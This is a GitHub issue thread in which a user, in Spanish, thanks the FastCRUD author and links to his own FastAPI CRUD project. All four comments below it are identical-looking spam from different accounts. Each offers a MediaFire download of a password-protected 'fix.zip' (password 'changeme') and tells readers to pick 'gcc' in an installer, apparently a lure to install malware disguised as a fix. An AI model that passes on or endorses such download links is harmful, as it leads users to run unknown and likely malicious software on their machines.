### ISSUE TITLE
Uso de este repo FASTCRUD para mi proyecto 

### ISSUE THREAD

**Issue by techotaku1** [awtkns/fastapi-crudrouter#198]
## Uso del Repositorio en Proyecto CRUD

Hola,

Quería informarte que he utilizado el repositorio [FastCRUD](https://github.com/igorbenav/fastcrud) como base para desarrollar mi propio proyecto CRUD con FastAPI. Agradezco mucho el trabajo que has hecho y la herramienta que has creado, ha sido muy útil para mi implementación.

Aquí está el enlace a mi proyecto donde he integrado FastCRUD: [Enlace al repositorio](https://github.com/techotaku1/FASTAPI-CRUD-1)

Gracias nuevamente por tu contribución a la comunidad!

Saludos,
techotaku1

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
